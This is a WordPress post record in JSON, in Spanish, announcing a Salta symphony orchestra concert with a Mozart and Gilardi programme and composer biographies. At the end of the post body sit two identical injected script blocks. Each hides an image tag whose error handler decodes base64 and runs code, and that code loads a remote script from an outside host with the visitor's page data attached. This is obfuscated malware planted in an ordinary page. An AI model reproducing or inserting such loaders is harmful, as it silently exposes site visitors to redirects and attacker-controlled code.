{"id":3879,"date":"2024-03-20T12:31:55","date_gmt":"2024-03-20T15:31:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3879"},"modified":"2025-08-13T23:58:02","modified_gmt":"2025-08-14T02:58:02","slug":"mozarteum-argentino-filial-salta-presenta-a-la-orquesta-sinfonica-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3879","title":{"rendered":"Mozarteum Argentino \u2013 Filial Salta presenta a la Orquesta Sinf\u00f3nica de Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-22d5af7a97698e8de3f67cd9fba87969\" style=\"background-color:#64041c\"><em>El viernes 22 del corriente, a partir de las 21, en el Teatro de la Fundaci\u00f3n, G\u00fcemes 434 se presentar\u00e1 la agrupaci\u00f3n\u00a0bajo la direcci\u00f3n de Elizabeth Vergara Gallego.<\/em><\/h3>\n\n\n\n<p>Bajo la direcci\u00f3n de&nbsp;<strong>Elizabeth Vergara<\/strong>&nbsp;como directora invitada, el viernes 22 de marzo a las 21, la Orquesta Sinf\u00f3nica de Salta brindar\u00e1 un nuevo concierto en el Teatro de la Fundaci\u00f3n, Gral. G\u00fcemes 434. &nbsp;<\/p>\n\n\n\n<p>Durante la velada, se interpretar\u00e1 \u201cPiruca y yo\u201d de Gilardo Gilardi y la Sinfon\u00eda Nro. 38 \u201cPraga\u201d de Wolfgang Amadeus Mozart.<\/p>\n\n\n\n<p>Las entradas se encuentran disponibles a la venta en la boleter\u00eda del Teatro de la Fundaci\u00f3n.<\/p>\n\n\n\n<p><strong>Sobre su compositor y la obra<\/strong><\/p>\n\n\n\n<p>Gilardo Gilardi (1889-1963) fue un destacado compositor, director de orquesta y pianista argentino. Naci\u00f3 el 13 de junio de 1889 en Buenos Aires, Argentina. Es conocido por su contribuci\u00f3n al desarrollo de la m\u00fasica cl\u00e1sica en Argentina y por su influencia en la educaci\u00f3n musical en su pa\u00eds.<\/p>\n\n\n\n<p>Gilardi estudi\u00f3 en el Conservatorio Nacional de M\u00fasica en Buenos Aires, donde m\u00e1s tarde tambi\u00e9n ense\u00f1\u00f3. Fue un defensor del nacionalismo musical argentino y trabaj\u00f3 activamente para promover la m\u00fasica cl\u00e1sica en su pa\u00eds. Es conocido por sus composiciones, que abarcan una variedad de g\u00e9neros, incluyendo m\u00fasica de c\u00e1mara, m\u00fasica sinf\u00f3nica, m\u00fasica vocal y m\u00fasica para piano. Adem\u00e1s de su trabajo como compositor, Gilardi tambi\u00e9n fue un director de orquesta muy respetado y actu\u00f3 en numerosos conciertos en Argentina y en el extranjero.<\/p>\n\n\n\n<p>Entre sus obras m\u00e1s conocidas se encuentran \u00abPreg\u00f3n de los jardineros\u00bb, \u00abLas estrellas\u00bb, \u00abPiruca y Yo\u00bb, \u00abCanci\u00f3n del arroyo\u00bb, entre otras. Gilardo Gilardi dej\u00f3 un legado duradero en la m\u00fasica argentina y sigue siendo recordado como uno de los m\u00fasicos m\u00e1s importantes del pa\u00eds.<\/p>\n\n\n\n<p>Wolfgang Amadeus Mozart (1756-1791) Compositor austriaco. Fue un ni\u00f1o prodigio que a los cuatro a\u00f1os interpretaba melod\u00edas sencillas y compon\u00eda peque\u00f1as piezas. Genio absoluto e irrepetible, su m\u00fasica conserva intacta su frescura y capacidad para sorprender y emocionar. Franz Joseph Haydn manifest\u00f3: \u00abel m\u00e1s grande compositor que conozco, en persona o de nombre\u00bb. Beethoven tambi\u00e9n confesaba su veneraci\u00f3n por Mozart. Se considera que Mozart y Beethoven son precedentes del romanticismo, han sabido expresar en sus obras lo que las palabras son incapaces de insinuar.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/mozarteum-argentino-filial-salta-presenta-a-la-orquesta-sinfonica-de-salta-94699\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El viernes 22 del corriente, a partir de las 21, en el Teatro de la Fundaci\u00f3n, G\u00fcemes 434 se presentar\u00e1 la agrupaci\u00f3n\u00a0bajo la direcci\u00f3n de Elizabeth Vergara Gallego. Bajo la direcci\u00f3n de&nbsp;Elizabeth Vergara&nbsp;como directora invitada, el viernes 22 de marzo a las 21, la Orquesta Sinf\u00f3nica de Salta brindar\u00e1 un nuevo concierto en el Teatro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3880,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-3879","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3879"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3879"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3879\/revisions"}],"predecessor-version":[{"id":6816,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3879\/revisions\/6816"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3880"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3879"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3879"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3879"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}